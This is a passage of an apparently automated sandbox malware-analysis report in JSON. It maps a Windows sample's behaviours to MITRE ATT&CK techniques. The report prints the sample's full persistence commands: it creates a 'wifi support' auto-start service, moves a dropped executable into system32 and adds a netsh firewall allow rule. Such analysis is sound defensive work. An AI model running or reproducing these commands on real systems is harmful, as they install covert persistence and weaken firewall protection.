940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005336)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" queries volume information of \"C:\\\" at 00000000-00004536-0000010C-1302743\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" queries volume information of \"C:\\\" at 00000000-00004536-0000010C-1304065\n \"clfkcbws.exe\" queries volume information of \"C:\\\" at 00000000-00005112-0000010C-2663049\n \"clfkcbws.exe\" queries volume information of \"C:\\\" at 00000000-00005112-0000010C-2664818\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-72951\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-765724\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-1412682\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00000364-0000010C-1414290", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7600fce2120080f4d875000076000000000089f4d87525bfaa4b0200000070e312006ce3120064e2120068e2120018e4120095e1b577c7e84c00c0e21200c83ae27534e31200d58cda7570e3120004e3120042a4d875a802e27544e31200d2f4d875080000006ef5d87544f5d8759dbeaa4b0200000070aaa46f0000130026bba46f18e31200020000000000130070aaa46f48e3120042a4d875a802e2758ce3120010a9a46f08000000e6a8a46fa8068a4b0200000070aaa46f0000130026bba46fac0e7600780e760058e312008050b06f18e41200f9f2a86fcc4d3c24 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000884c2ae70300000044e56901a96d2c4a880500008ce56901c0e46901590000000300000048e4690150e4690118e6690150b870720d063739feffffff98e569016fe46f72884c2ae798e569017ce46f72060000000000aa6a010000008fe46f723333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56901000000008e00000044e66901feffffffcce56901cf00ba77d600ba771b119c768e0000004700000044e6690100000000a0e569010000000008e66901 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600e6e1294944de69016d828a76cc18220004010000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330030006100330065003200620063003600660061006100660034003700350033003700320061003600330030003600390036003200610066003800340063006600320036003400320034003600350036006400350032006400630061003700330039002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bb977273c9c76d8ebef75ac011a0000001a0000000000000000000300ed00c2000000000000000000000000000000000000000400e800c2000000000000000000000008701a0000000000200000000000000000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001a0070c42400000000003e00003e340000c098c6240010da240050882300f001000000001a000400000070c42400acee69010464b97738011a00e063b9777b1a9c760000000000001a0078c424006dd1ba768a7bd14a6cae6a760000000000000000f001000010da2400d82f1a000100000000001a0050011a000c00000078c42400d82f1a000200000218000000bb20009b820000000000000000000000030000004cee6901820000007f07000000000000bb20009b02000000c075c27610da240000000000c075c27668ee6901e8301a0000000000d82f1a00c0ee6901ff2bb977 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000136741060300000044e56901a96d2c4a441200008ce56901c0e469015b0000000300000048e4690150e4690118e6690150b870720d063739feffffff98e569016fe46f721367410698e569017ce46f72820500000000aa6a010000008fe46f723333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001a0028b02100000000003e00003e340000c050b22100c8b5210058481e00f001000000001a000400000028b02100acee69010464b97738011a00e063b9777b1a9c760000000000001a0030b021006dd1ba768a7bd14a6cae6a760000000000000000fc000000c8b52100d82f1a000100000000001a0050011a000c00000030b02100d82f1a000200000218000000f60000f6820000000000000000000000030000004cee69018200000076000000000000004726006102000000c075c276b0bd250000000000c075c27668ee690108301a0000000000d82f1a00c0ee6901ff2bb977 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000309fd3140300000044e56901a96d2c4ac00600008ce56901c0e469015b0000000300000048e4690150e4690118e6690150b870720d063739feffffff98e569016fe46f72309fd31498e569017ce46f72820500000000aa6a010000008fe46f723333ff048205000006000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00000364)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"IsWow64Process\" with parameter \"4536\" - (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"clfkcbws.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005336)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005336)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004536)\n \"cmd.exe\" called \"FindNextFileW\" with parameter clfkcbws.exe (UID: 00000000-00004688)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000bacd72db02c000000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e22db767be33b7670000000000000000\" - (UID: 00000000-00000364)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"clfkcbws.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"clfkcbws.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"2b61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"1833264\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005336)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005336)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"clfkcbws.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\NJRBICEI\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\clfkcbws.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\clfkcbws.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"clfkcbws.exe.67B73C0E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"clfkcbws.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\clfkcbws.exe]- [targetUID: 00000000-00004536]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has section name .text with entropy \"6.63010280368\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has section name .text with entropy \"7.97285529131\"\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739\" has section name .reloc with entropy \"6.22149605003\"\n \"clfkcbws.exe\" has section name .text with entropy \"6.63010280368\"\n \"clfkcbws.exe\" has section name .text with entropy \"7.97285529131\"\n \"clfkcbws.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004536)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" (UID: 00000000-00004536)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00000884)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\clfkcbws.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004688)\n Spawned process \"sc.exe\" with commandline \"create njrbicei binPath= \"%WINDIR%\\\\system32\\\\njrbicei\\\\clfkcbws.exe /d\\\\\"C:\\\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00002348)\n Spawned process \"sc.exe\" with commandline \"description njrbicei \"wifi internet conection\"\" (UID: 00000000-00004540)\n Spawned process \"sc.exe\" with commandline \"start njrbicei\" (UID: 00000000-00000176)\n Spawned process \"clfkcbws.exe\" with commandline \"/d\"C:\\\\308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\"\" (UID: 00000000-00005112)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00005336)\n Spawned process \"svchost.exe\" (UID: 00000000-00000364)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 552)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" wrote 52 bytes to a remote process 